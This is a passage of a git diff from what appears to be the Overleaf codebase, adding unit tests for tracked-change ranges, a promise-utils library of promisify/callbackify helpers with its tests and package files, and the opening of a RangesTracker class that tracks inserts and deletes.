trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyDelete(5, 2) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 8 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should delete tracked changes when the whole range is deleted', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyDelete(0, 10) + expect(trackedChanges.length).to.equal(0) + expect(trackedChanges.toRaw()).to.deep.equal([]) + }) + + it('should delete tracked changes when more than the whole range is deleted', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 5, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyDelete(0, 25) + expect(trackedChanges.length).to.equal(0) + expect(trackedChanges.toRaw()).to.deep.equal([]) + }) + + it('should shrink the tracked change from start with overlap', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyDelete(1, 9) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 1 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should shrink the tracked change from end with overlap', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyDelete(0, 9) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 1 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + }) + + describe('fromRaw & toRaw', function () { + it('should survive serialization', function () { + /** @type {TrackedChangeRawData[]} */ + const initialRaw = [ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ] + + const trackedChanges = TrackedChangeList.fromRaw(initialRaw) + const raw = trackedChanges.toRaw() + const newTrackedChanges = TrackedChangeList.fromRaw(raw) + + expect(newTrackedChanges).to.deep.equal(trackedChanges) + expect(raw).to.deep.equal(initialRaw) + }) + }) + + describe('applyRetain', function () { + it('should add tracking information to an untracked range', function () { + const trackedChanges = TrackedChangeList.fromRaw([]) + trackedChanges.applyRetain(0, 10, { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should shrink a tracked range to make room for retained operation', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 3, length: 7 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(0, 5, { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(2) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 5 }, + tracking: { + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 5, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should break up a tracked range to make room for retained operation', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(5, 1, { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(3) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 5, length: 1 }, + tracking: { + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 6, length: 4 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should update the timestamp of a tracked range', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(1, 12, { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 13 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should leave ignore a retain operation with no tracking info', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(0, 10) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should leave not break up a tracked change for a retain with no tracking info', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(4, 1) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should delete a tracked change which is being resolved', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(0, 10, { + tracking: new ClearTrackingProps(), + }) + expect(trackedChanges.length).to.equal(0) + expect(trackedChanges.toRaw()).to.deep.equal([]) + }) + + it('should delete a tracked change which is being resolved by other user', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(0, 10, { + tracking: new ClearTrackingProps(), + }) + expect(trackedChanges.length).to.equal(0) + expect(trackedChanges.toRaw()).to.deep.equal([]) + }) + + it('should delete a tracked change which is being rejected', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'delete', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(0, 10, { + tracking: new ClearTrackingProps(), + }) + expect(trackedChanges.length).to.equal(0) + expect(trackedChanges.toRaw()).to.deep.equal([]) + }) + + it('should delete a tracked change which is being rejected by other user', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'delete', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(0, 10, { + tracking: new ClearTrackingProps(), + }) + expect(trackedChanges.length).to.equal(0) + expect(trackedChanges.toRaw()).to.deep.equal([]) + }) + + it('should append a new tracked change when retaining a range from another user with tracking info', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 4, length: 4 }, + tracking: { + type: 'delete', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(8, 1, { + tracking: TrackingProps.fromRaw({ + type: 'delete', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(2) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 4, length: 4 }, + tracking: { + type: 'delete', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 8, length: 1 }, + tracking: { + type: 'delete', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + }) + }) +}) diff --git a/libraries/overleaf-editor-core/tsconfig.json b/libraries/overleaf-editor-core/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/overleaf-editor-core/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/promise-utils/.gitignore b/libraries/promise-utils/.gitignore new file mode 100644 index 0000000..edb0f85 --- /dev/null +++ b/libraries/promise-utils/.gitignore @@ -0,0 +1,3 @@ + +# managed by monorepo$ bin/update_build_scripts +.npmrc diff --git a/libraries/promise-utils/.mocharc.json b/libraries/promise-utils/.mocharc.json new file mode 100644 index 0000000..3be9ee5 --- /dev/null +++ b/libraries/promise-utils/.mocharc.json @@ -0,0 +1,5 @@ +{ + "ui": "bdd", + "recursive": "true", + "reporter": "spec" +} diff --git a/libraries/promise-utils/.nvmrc b/libraries/promise-utils/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/promise-utils/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/promise-utils/buildscript.txt b/libraries/promise-utils/buildscript.txt new file mode 100644 index 0000000..51a6dad --- /dev/null +++ b/libraries/promise-utils/buildscript.txt @@ -0,0 +1,10 @@ +promise-utils +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/promise-utils/index.js b/libraries/promise-utils/index.js new file mode 100644 index 0000000..557210a --- /dev/null +++ b/libraries/promise-utils/index.js @@ -0,0 +1,283 @@ +const { promisify, callbackify } = require('node:util') +const pLimit = require('p-limit') + +module.exports = { + promisify, + promisifyAll, + promisifyClass, + promisifyMultiResult, + callbackify, + callbackifyAll, + callbackifyClass, + callbackifyMultiResult, + expressify, + expressifyErrorHandler, + promiseMapWithLimit, + promiseMapSettledWithLimit, +} + +/** + * Promisify all functions in a module. + * + * This is meant to be used only when all functions in the module are async + * callback-style functions. + * + * It's very much tailored to our current module structure. In particular, it + * binds `this` to the module when calling the function in order not to break + * modules that call sibling functions using `this`. + * + * This will not magically fix all modules. Special cases should be promisified + * manually. + * + * The second argument is a bag of options: + * + * - without: an array of function names that shouldn't be promisified + * + * - multiResult: an object whose keys are function names and values are lists + * of parameter names. This is meant for functions that invoke their callbacks + * with more than one result in separate parameters. The promisifed function + * will return these results as a single object, with each result keyed under + * the corresponding parameter name. + */ +function promisifyAll(module, opts = {}) { + const { without = [], multiResult = {} } = opts + const promises = {} + for (const propName of Object.getOwnPropertyNames(module)) { + if (without.includes(propName)) { + continue + } + const propValue = module[propName] + if (typeof propValue !== 'function') { + continue + } + if (multiResult[propName] != null) { + promises[propName] = promisifyMultiResult( + propValue, + multiResult[propName] + ).bind(module) + } else { + promises[propName] = promisify(propValue).bind(module) + } + } + return promises +} + +/** + * Promisify all methods in a class. + * + * Options are the same as for promisifyAll + */ +function promisifyClass(cls, opts = {}) { + const promisified = class extends cls {} + const { without = [], multiResult = {} } = opts + for (const propName of Object.getOwnPropertyNames(cls.prototype)) { + if (propName === 'constructor' || without.includes(propName)) { + continue + } + const propValue = cls.prototype[propName] + if (typeof propValue !== 'function') { + continue + } + if (multiResult[propName] != null) { + promisified.prototype[propName] = promisifyMultiResult( + propValue, + multiResult[propName] + ) + } else { + promisified.prototype[propName] = promisify(propValue) + } + } + return promisified +} + +/** + * Promisify a function that returns multiple results via additional callback + * parameters. + * + * The promisified function returns the results in a single object whose keys + * are the names given in the array `resultNames`. + * + * Example: + * + * function f(callback) { + * return callback(null, 1, 2, 3) + * } + * + * const g = promisifyMultiResult(f, ['a', 'b', 'c']) + * + * const result = await g() // returns {a: 1, b: 2, c: 3} + */ +function promisifyMultiResult(fn, resultNames) { + function promisified(...args) { + return new Promise((resolve, reject) => { + try { + fn.bind(this)(...args, (err, ...results) => { + if (err != null) { + return reject(err) + } + const promiseResult = {} + for (let i = 0; i < resultNames.length; i++) { + promiseResult[resultNames[i]] = results[i] + } + resolve(promiseResult) + }) + } catch (err) { + reject(err) + } + }) + } + return promisified +} + +/** + * Reverse of `promisifyAll`. + * + * Callbackify all async functions in a module and return them in an object. In + * contrast with `promisifyAll`, all other exports from the module are added to + * the result. + * + * This is meant to be used like this: + * + * const MyPromisifiedModule = {...} + * module.exports = { + * ...callbackifyAll(MyPromisifiedModule), + * promises: MyPromisifiedModule + * } + * + * @param {Object} module - The module to callbackify + * @param {Object} opts - Options + * @param {Array} opts.without - Array of method names to exclude from + * being callbackified + * @param {Object} opts.multiResult - Spec of methods to be callbackified with + * callbackifyMultiResult() + */ +function callbackifyAll(module, opts = {}) { + const { without = [], multiResult = {} } = opts + const callbacks = {} + for (const propName of Object.getOwnPropertyNames(module)) { + if (without.includes(propName)) { + continue + } + const propValue = module[propName] + if (typeof propValue === 'function') { + if (propValue.constructor.name === 'AsyncFunction') { + if (multiResult[propName] != null) { + callbacks[propName] = callbackifyMultiResult( + propValue, + multiResult[propName] + ).bind(module) + } else { + callbacks[propName] = callbackify(propValue).bind(module) + } + } else { + callbacks[propName] = propValue.bind(module) + } + } else { + callbacks[propName] = propValue + } + } + return callbacks +} + +/** + * Callbackify all methods in a class. + * + * Options are the same as for callbackifyAll + */ +function callbackifyClass(cls, opts = {}) { + const callbackified = class extends cls {} + const { without = [], multiResult = {} } = opts + for (const propName of Object.getOwnPropertyNames(cls.prototype)) { + if (propName === 'constructor' || without.includes(propName)) { + continue + } + const propValue = cls.prototype[propName] + if (typeof propValue !== 'function') { + continue + } + if (multiResult[propName] != null) { + callbackified.prototype[propName] = callbackifyMultiResult( + propValue, + multiResult[propName] + ) + } else { + callbackified.prototype[propName] = callbackify(propValue) + } + } + return callbackified +} + +/** + * Reverse the effect of `promisifyMultiResult`. + * + * This is meant for providing a temporary backward compatible callback + * interface while we migrate to promises. + */ +function callbackifyMultiResult(fn, resultNames) { + function callbackified(...args) { + const [callback] = args.splice(-1) + fn.apply(this, args) + .then(result => { + const cbResults = resultNames.map(resultName => result[resultName]) + callback(null, ...cbResults) + }) + .catch(err => { + callback(err) + }) + } + return callbackified +} + +/** + * Transform an async function into an Express middleware + * + * Any error will be passed to the error middlewares via `next()` + */ +function expressify(fn) { + return (req, res, next) => { + return fn(req, res, next).catch(next) + } +} + +/** + * Transform an async function into an Error Handling Express middleware + * + * Any error will be passed to the error middlewares via `next()` + */ +function expressifyErrorHandler(fn) { + return (err, req, res, next) => { + fn(err, req, res, next).catch(next) + } +} + +/** + * Map values in `array` with the async function `fn` + * + * Limit the number of unresolved promises to `concurrency`. + * @template T + * @template V + * @param {number} concurrency + * @param {Array} array + * @param {(arg: T) => Promise} fn + * @return {Promise>>} + */ +async function promiseMapWithLimit(concurrency, array, fn) { + const limit = pLimit(concurrency) + return await Promise.all(array.map(x => limit(() => fn(x)))) +} + +/** + * Map values in `array` with the async function `fn` + * + * Limit the number of unresolved promises to `concurrency`. + * + * @template T, U + * @param {number} concurrency + * @param {Array} array + * @param {(T) => Promise} fn + * @return {Promise>>} + */ +function promiseMapSettledWithLimit(concurrency, array, fn) { + const limit = pLimit(concurrency) + return Promise.allSettled(array.map(x => limit(() => fn(x)))) +} diff --git a/libraries/promise-utils/package.json b/libraries/promise-utils/package.json new file mode 100644 index 0000000..40f05b7 --- /dev/null +++ b/libraries/promise-utils/package.json @@ -0,0 +1,27 @@ +{ + "name": "@overleaf/promise-utils", + "version": "0.1.0", + "description": "utilities to help working with promises", + "main": "index.js", + "scripts": { + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test:ci": "npm run test:unit", + "types:check": "tsc --noEmit" + }, + "author": "Overleaf (https://www.overleaf.com)", + "license": "AGPL-3.0-only", + "devDependencies": { + "chai": "^4.3.10", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + }, + "dependencies": { + "p-limit": "^2.3.0" + } +} diff --git a/libraries/promise-utils/test/setup.js b/libraries/promise-utils/test/setup.js new file mode 100644 index 0000000..0906818 --- /dev/null +++ b/libraries/promise-utils/test/setup.js @@ -0,0 +1,4 @@ +const chai = require('chai') +const chaiAsPromised = require('chai-as-promised') + +chai.use(chaiAsPromised) diff --git a/libraries/promise-utils/test/unit/PromiseUtilsTests.js b/libraries/promise-utils/test/unit/PromiseUtilsTests.js new file mode 100644 index 0000000..ad0e12a --- /dev/null +++ b/libraries/promise-utils/test/unit/PromiseUtilsTests.js @@ -0,0 +1,451 @@ +const { expect } = require('chai') +const { + promisifyAll, + promisifyClass, + callbackifyMultiResult, + callbackifyClass, + callbackifyAll, + expressify, + expressifyErrorHandler, +} = require('../..') + +describe('promisifyAll', function () { + describe('basic functionality', function () { + before(function () { + this.module = { + SOME_CONSTANT: 1, + asyncAdd(a, b, callback) { + callback(null, a + b) + }, + asyncDouble(x, callback) { + this.asyncAdd(x, x, callback) + }, + } + this.promisified = promisifyAll(this.module) + }) + + it('promisifies functions in the module', async function () { + const sum = await this.promisified.asyncAdd(29, 33) + expect(sum).to.equal(62) + }) + + it('binds this to the original module', async function () { + const sum = await this.promisified.asyncDouble(38) + expect(sum).to.equal(76) + }) + + it('does not copy over non-functions', async function () { + expect(this.promisified).not.to.have.property('SOME_CONSTANT') + }) + + it('does not modify the prototype of the module', async function () { + expect(this.promisified.toString()).to.equal('[object Object]') + }) + }) + + describe('without option', function () { + before(function () { + this.module = { + asyncAdd(a, b, callback) { + callback(null, a + b) + }, + syncAdd(a, b) { + return a + b + }, + } + this.promisified = promisifyAll(this.module, { without: ['syncAdd'] }) + }) + + it('does not promisify excluded functions', function () { + expect(this.promisified.syncAdd).not.to.exist + }) + + it('promisifies other functions', async function () { + const sum = await this.promisified.asyncAdd(12, 89) + expect(sum).to.equal(101) + }) + }) + + describe('multiResult option', function () { + before(function () { + this.module = { + asyncAdd(a, b, callback) { + callback(null, a + b) + }, + asyncArithmetic(a, b, callback) { + callback(null, a + b, a * b) + }, + } + this.promisified = promisifyAll(this.module, { + multiResult: { asyncArithmetic: ['sum', 'product'] }, + }) + }) + + it('promisifies multi-result functions', async function () { + const result = await this.promisified.asyncArithmetic(3, 6) + expect(result).to.deep.equal({ sum: 9, product: 18 }) + }) + + it('promisifies other functions normally', async function () { + const sum = await this.promisified.asyncAdd(6, 1) + expect(sum).to.equal(7) + }) + }) +}) + +describe('promisifyClass', function () { + describe('basic functionality', function () { + before(function () { + this.Class = class { + constructor(a) { + this.a = a + } + + asyncAdd(b, callback) { + callback(null, this.a + b) + } + } + this.Promisified = promisifyClass(this.Class) + }) + + it('promisifies the class methods', async function () { + const adder = new this.Promisified(1) + const sum = await adder.asyncAdd(2) + expect(sum).to.equal(3) + }) + }) + + describe('without option', function () { + before(function () { + this.Class = class { + constructor(a) { + this.a = a + } + + asyncAdd(b, callback) { + callback(null, this.a + b) + } + + syncAdd(b) { + return this.a + b + } + } + this.Promisified = promisifyClass(this.Class, { without: ['syncAdd'] }) + }) + + it('does not promisify excluded functions', function () { + const adder = new this.Promisified(10) + const sum = adder.syncAdd(12) + expect(sum).to.equal(22) + }) + + it('promisifies other functions', async function () { + const adder = new this.Promisified(23) + const sum = await adder.asyncAdd(3) + expect(sum).to.equal(26) + }) + }) + + describe('multiResult option', function () { + before(function () { + this.Class = class { + constructor(a) { + this.a = a + } + + asyncAdd(b, callback) { + callback(null, this.a + b) + } + + asyncArithmetic(b, callback) { + callback(null, this.a + b, this.a * b) + } + } + this.Promisified = promisifyClass(this.Class, { + multiResult: { asyncArithmetic: ['sum', 'product'] }, + }) + }) + + it('promisifies multi-result functions', async function () { + const adder = new this.Promisified(3) + const result = await adder.asyncArithmetic(6) + expect(result).to.deep.equal({ sum: 9, product: 18 }) + }) + + it('promisifies other functions normally', async function () { + const adder = new this.Promisified(6) + const sum = await adder.asyncAdd(1) + expect(sum).to.equal(7) + }) + }) +}) + +describe('callbackifyMultiResult', function () { + it('callbackifies a multi-result function', function (done) { + async function asyncArithmetic(a, b) { + return { sum: a + b, product: a * b } + } + const callbackified = callbackifyMultiResult(asyncArithmetic, [ + 'sum', + 'product', + ]) + callbackified(3, 11, (err, sum, product) => { + if (err != null) { + return done(err) + } + expect(sum).to.equal(14) + expect(product).to.equal(33) + done() + }) + }) + + it('propagates errors', function (done) { + async function asyncBomb() { + throw new Error('BOOM!') + } + const callbackified = callbackifyMultiResult(asyncBomb, [ + 'explosives', + 'dynamite', + ]) + callbackified(err => { + expect(err).to.exist + done() + }) + }) +}) + +describe('callbackifyAll', function () { + describe('basic functionality', function () { + before(function () { + this.module = { + SOME_CONSTANT: 1, + async asyncAdd(a, b) { + return a + b + }, + async asyncDouble(x, callback) { + return await this.asyncAdd(x, x) + }, + dashConcat(a, b) { + return `${a}-${b}` + }, + } + this.callbackified = callbackifyAll(this.module) + }) + + it('callbackifies async functions in the module', function (done) { + this.callbackified.asyncAdd(77, 18, (err, sum) => { + if (err) { + return done(err) + } + expect(sum).to.equal(95) + done() + }) + }) + + it('binds this to the original module', function (done) { + this.callbackified.asyncDouble(20, (err, double) => { + if (err) { + return done(err) + } + expect(double).to.equal(40) + done() + }) + }) + + it('copies over regular functions', function () { + const s = this.callbackified.dashConcat('ping', 'pong') + expect(s).to.equal('ping-pong') + }) + + it('copies over non-functions', function () { + expect(this.callbackified.SOME_CONSTANT).to.equal(1) + }) + }) + + describe('multiResult option', function () { + before(function () { + this.module = { + async asyncAdd(a, b) { + return a + b + }, + async asyncArithmetic(a, b) { + return { sum: a + b, product: a * b } + }, + } + this.callbackified = callbackifyAll(this.module, { + multiResult: { asyncArithmetic: ['sum', 'product'] }, + }) + }) + + it('callbackifies multi-result functions', function (done) { + this.callbackified.asyncArithmetic(4, 5, (err, sum, product) => { + if (err) { + return done(err) + } + expect(sum).to.equal(9) + expect(product).to.equal(20) + done() + }) + }) + + it('callbackifies other functions normally', function (done) { + this.callbackified.asyncAdd(77, 18, (err, sum) => { + if (err) { + return done(err) + } + expect(sum).to.equal(95) + done() + }) + }) + }) + + describe('without option', function () { + before(function () { + this.module = { + async asyncAdd(a, b) { + return a + b + }, + async asyncArithmetic(a, b) { + return { sum: a + b, product: a * b } + }, + } + this.callbackified = callbackifyAll(this.module, { + without: ['asyncAdd'], + }) + }) + + it('does not callbackify excluded functions', function () { + expect(this.callbackified.asyncAdd).not.to.exist + }) + + it('callbackifies other functions', async function () { + this.callbackified.asyncArithmetic(5, 6, (err, { sum, product }) => { + expect(err).not.to.exist + expect(sum).to.equal(11) + expect(product).to.equal(30) + }) + }) + }) +}) + +describe('callbackifyClass', function () { + describe('basic functionality', function () { + before(function () { + this.Class = class { + constructor(a) { + this.a = a + } + + async asyncAdd(b) { + return this.a + b + } + } + this.Callbackified = callbackifyClass(this.Class) + }) + + it('callbackifies the class methods', function (done) { + const adder = new this.Callbackified(1) + adder.asyncAdd(2, (err, sum) => { + expect(err).not.to.exist + expect(sum).to.equal(3) + done() + }) + }) + }) + + describe('without option', function () { + before(function () { + this.Class = class { + constructor(a) { + this.a = a + } + + async asyncAdd(b) { + return this.a + b + } + + syncAdd(b) { + return this.a + b + } + } + this.Callbackified = callbackifyClass(this.Class, { + without: ['syncAdd'], + }) + }) + + it('does not callbackify excluded functions', function () { + const adder = new this.Callbackified(10) + const sum = adder.syncAdd(12) + expect(sum).to.equal(22) + }) + + it('callbackifies other functions', function (done) { + const adder = new this.Callbackified(1) + adder.asyncAdd(2, (err, sum) => { + expect(err).not.to.exist + expect(sum).to.equal(3) + done() + }) + }) + }) + + describe('multiResult option', function () { + before(function () { + this.Class = class { + constructor(a) { + this.a = a + } + + async asyncAdd(b) { + return this.a + b + } + + async asyncArithmetic(b) { + return { sum: this.a + b, product: this.a * b } + } + } + this.Callbackified = callbackifyClass(this.Class, { + multiResult: { asyncArithmetic: ['sum', 'product'] }, + }) + }) + + it('callbackifies multi-result functions', function (done) { + const adder = new this.Callbackified(3) + adder.asyncArithmetic(6, (err, sum, product) => { + expect(err).not.to.exist + expect(sum).to.equal(9) + expect(product).to.equal(18) + done() + }) + }) + + it('callbackifies other functions normally', function (done) { + const adder = new this.Callbackified(6) + adder.asyncAdd(2, (err, sum) => { + expect(err).not.to.exist + expect(sum).to.equal(8) + done() + }) + }) + }) +}) + +describe('expressify', function () { + it('should propagate any rejection to the "next" callback', function (done) { + const fn = () => Promise.reject(new Error('rejected')) + expressify(fn)({}, {}, error => { + expect(error.message).to.equal('rejected') + done() + }) + }) +}) + +describe('expressifyErrorHandler', function () { + it('should propagate any rejection to the "next" callback', function (done) { + const fn = () => Promise.reject(new Error('rejected')) + expressifyErrorHandler(fn)({}, {}, {}, error => { + expect(error.message).to.equal('rejected') + done() + }) + }) +}) diff --git a/libraries/promise-utils/tsconfig.json b/libraries/promise-utils/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/promise-utils/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/ranges-tracker/.gitignore b/libraries/ranges-tracker/.gitignore new file mode 100644 index 0000000..eac2002 --- /dev/null +++ b/libraries/ranges-tracker/.gitignore @@ -0,0 +1,13 @@ +**.swp + +app.js +app/js/ +test/unit/js/ +public/build/ + +node_modules/ + +/public/js/chat.js +plato/ + +.npmrc diff --git a/libraries/ranges-tracker/.nvmrc b/libraries/ranges-tracker/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/ranges-tracker/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/ranges-tracker/buildscript.txt b/libraries/ranges-tracker/buildscript.txt new file mode 100644 index 0000000..d112f85 --- /dev/null +++ b/libraries/ranges-tracker/buildscript.txt @@ -0,0 +1,10 @@ +ranges-tracker +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/ranges-tracker/index.cjs b/libraries/ranges-tracker/index.cjs new file mode 100644 index 0000000..a94e265 --- /dev/null +++ b/libraries/ranges-tracker/index.cjs @@ -0,0 +1,793 @@ +/** + * The purpose of this class is to track a set of inserts and deletes to a document, like + * track changes in Word. We store these as a set of ShareJs style ranges: + * {i: "foo", p: 42} # Insert 'foo' at offset 42 + * {d: "bar", p: 37} # Delete 'bar' at offset 37 + * We only track the inserts and deletes, not the whole document, but by being given all + * updates that are applied to a document, we can update these appropriately. + * + * Note that the set of inserts and deletes we store applies to the document as-is at the moment. + * So inserts correspond to text which is in the document, while deletes correspond to text which + * is no longer there, so their lengths do not affect the position of later offsets. + * E.g. + * this is the current text of the document + * |-----| | + * {i: "current ", p:12} -^ ^- {d: "old ", p: 31} + * + * Track changes rules (should be consistent with Word): + * * When text is inserted at a delete, the text goes to the left of the delete + * I.e. "foo|bar" -> "foobaz|bar", where | is the delete, and 'baz' is inserted + * * Deleting content flagged as 'inserted' does not create a new delete marker, it only + * removes the insert marker. E.g. + * * "abdefghijkl" -> "abfghijkl" when 'de' is deleted. No delete marker added + * |---| <- inserted |-| <- inserted + * * Deletes overlapping regular text and inserted text will insert a delete marker for the + * regular text: + * "abcdefghijkl" -> "abcdejkl" when 'fghi' is deleted + * |----| |--|| + * ^- inserted 'bcdefg' \ ^- deleted 'hi' + * \--inserted 'bcde' + * * Deletes overlapping other deletes are merged. E.g. + * "abcghijkl" -> "ahijkl" when 'bcg is deleted' + * | <- delete 'def' | <- delete 'bcdefg' + * * Deletes by another user will consume deletes by the first user + * * Inserts by another user will not combine with inserts by the first user. If they are in the + * middle of a previous insert by the first user, the original insert will be split into two. + */ +class RangesTracker { + constructor(changes, comments) { + if (changes == null) { + changes = [] + } + this.changes = changes + if (comments == null) { + comments = [] + } + this.comments = comments + this.track_changes = false + this.id_seed = RangesTracker.generateIdSeed() + this.id_increment = 0 + this._dirtyState = { + comment: { + moved: {}, + removed: {}, + added: {}, + }, + change: { + moved: 